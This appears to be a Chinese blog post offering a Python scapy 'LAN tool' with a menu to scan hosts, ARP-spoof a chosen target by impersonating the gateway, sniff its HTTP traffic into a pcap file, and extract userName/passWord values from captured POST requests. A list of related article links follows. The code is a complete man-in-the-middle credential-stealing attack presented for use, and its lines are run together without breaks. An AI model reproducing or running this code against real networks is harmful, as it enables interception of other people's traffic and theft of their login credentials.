python 实现扫描器,arp欺骗,数据包分析。
from scapy.all import *
import os
import re
import time
import threading
result=os.popen("route print").read()
re1=re.findall(r"0\.0\.0\.0\s+0\.0\.0\.0\s+(.+?)\s+(.+?)\s",result)
gateway=re1[0][0] #获取本机网关
ip=re1[0][1] #获取本机ip
addr={}
print(ip,gateway)
def scan(IpScan):print("扫描中,请稍候...")#r与srp,发送并接受,且sr不能发送二层协议,srp才能。#ans是收到的有响应的包,unans指收到的没有响应的包。ans,unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=IpScan),timeout=2,verbose=0)print("本次扫描一共扫描到%d台主机:" % len(ans))for send,recv in ans: #接受对方回应包里面的Mac地址和IP地址print("%s----%s"%(recv[Ether].src,recv[ARP].psrc)) #将对方的回应的Mac地址和IP地址存到字典里面key=ip,value=macaddr[recv[ARP].psrc]=recv[Ether].src
def cap(tt,m):#监听接收方ip是m的https信息tt秒,并存到pks里面pkts=sniff(filter="tcp dst port 80 and host {}".format(m),timeout=tt)wrpcap("demo.pcap",pkts) #保存在同一目录,生成demo.pcap文件print("抓包数据已保存!")
def spoof():m=input("请输入一个攻击目标:")t1=int(input("请输入攻击时间:"))t=threading.Thread(target=cap,args=(t1,m))t.start()for i in range(t1*5):#arp欺骗,冒充网关给m发包sendp(Ether(dst=addr[m])/ARP(psrc=gateway,pdst=m),verbose=0)time.sleep(0.1)print("攻击完成!")
def analyze():pkts=rdpcap("demo.pcap")#读取包for p in pkts:if p.haslayer(Raw):#找出有上网数据的try:httpr=p.load.decode()if not httpr.startswith("GET"): #找post的包#userName=17791911663&passWord=abc123456username=re.findall(r"userName=(\w+)",httpr)pwd=re.findall(r"passWord=(\w+)",httpr)if username and pwd:print(time.ctime(p.time))print("用户名:",username[0])print("密码:",pwd[0])except:pass
while 1:print("欢迎使用我的局域网小工具:")print("1 扫描")print("2 欺骗")print("3 分析")print("4 退出")op=input("你的操作:")if op=="1":scan(ip+"/24")elif op=="2":spoof()elif op=="3":analyze()else:break
print("再见!")
python 实现扫描器,arp欺骗,数据包分析。相关推荐
- 网络安全—arp欺骗原理数据包分析
网络安全-arp欺骗原理&数据包分析 提要:arp欺骗虽然比较简单,但是在日常面试中也是会被经常问到的问题,本文将通过kali中的arpspoof工具进行arp攻击,同时使用wireshark ...
- arp协议分析python编程实现arp欺骗抓图片
arp协议分析&python编程实现arp欺骗抓图片 序 学校tcp/ip协议分析课程老师布置的任务,要求分析一种网络协议并且研究安全问题并编程实现,于是我选择了研究arp协议,并且利用pyt ...
- python实现——数据包分析
需求分析 工作中经常会碰到设备大量告警,收到成百上千的取证包,面对如此众多的数据包,如何确认这些取证包是不是正确告警的结果呢?只能打开数据包分析看有没有相关攻击特征.由此,可以使用snort进行检测, ...
- python+scapy实现ARP欺骗
python+scapy实现ARP欺骗 需要下载的库 ARP欺骗原理 源代码: 运行结果 需要下载的库 可以直接通过pip下载 pip install scapy ARP欺骗原理 设网关的IP为10. ...
- 《Wireshark数据包分析实战(第2版)》目录—导读
版权声明 Wireshark数据包分析实战(第2版) Copyright © 2011 by Chris Sanders. Title of English-language original:Pra ...
- 网络数据包分析工具列表
此列表内容主要来自于某书的附录部分. 1.WireShark,这方面神器级工具,不赘述,自己好好学吧. 2.tcpdump和windump,完全基于文本的数据包捕获和分析 3.Cain&Abe ...
- pcap文件解析工具_【免费毕设】PHP网络数据包分析工具的设计与开发(源代码+论文)...
点击上方"蓝字"关注我们目录 系统设计 网络数据包分析系统的设计 整个网络数据报分析工具采用模块化的设计思想,原因是许多程序太长或太复杂,很难写在单一单元中.如果把代码分为较小的功 ...
- ARP协议抓包分析 -- wireshark
ARP协议抓包分析 – wireshark ARP- Address Resolution Protocol协议,即地址解析协议.该协议功能就是将IP地址解析成MAC地址. 在发送数据的时候,只知道目 ...
- 写一个java的网络数据包分析程序(一)
需要写一个工具监控我所负责项目中的服务器与客户端的交易事件,而我又不方便修改系统代码(因为此工具只是我自己为了工作方便而作),因此需要通过监听并分析网络数据包来获取信息. 原本打算将tcpdump的C ...
- tcpdump使用详解及数据包分析
tcpdump使用与数据分析 语法 tcpdump(选项) 选项 -A 以ASCII码方式显示每一个数据包(不会显示数据包中链路层头部信息). 在抓取包含网页数据的数据包时, 可方便查看数据(nt: ...
最新文章
- 预训练BERT学习笔记_Storm*Rage的博客
- 全选或者单选checkbox的值动态添加到div
- 收藏:Asp.net中基于Forms验证的角色验证授权
- 用 Python 分析了 20 万场吃鸡数据,看看玩家群体是怎么样的
- 简述python程序执行原理_Python程序的执行原理(1)
- javascript中setInterval,setTimeout的区别跟用法
- UVA1585 Score
- [Pyramid 杂记]Static Routes,静态路由是用来干什么的?
- 关于近期对自己的总结
- JS判断UA动态加载CSS的方法
- idea 热部署无效
- 20145209 《信息安全系统设计基础》第10周学习总结
- 贝叶斯算法伪代码_字节跳动算法面经
- 黑马程序员 接口 总结
- 无线网络安全——1、WiFi安全基础知识
- 用Python做一个Mean Rerversion策略
- 微创脑科学上市破发:公司市值143亿港元 微创医疗是大股东
- 芯片ECO的种类和修复方法介绍
- 使用阿里云DNS实现自己的DDNS服务
- 5g局域网传输速度_5G时代网络传输速度能达到多少?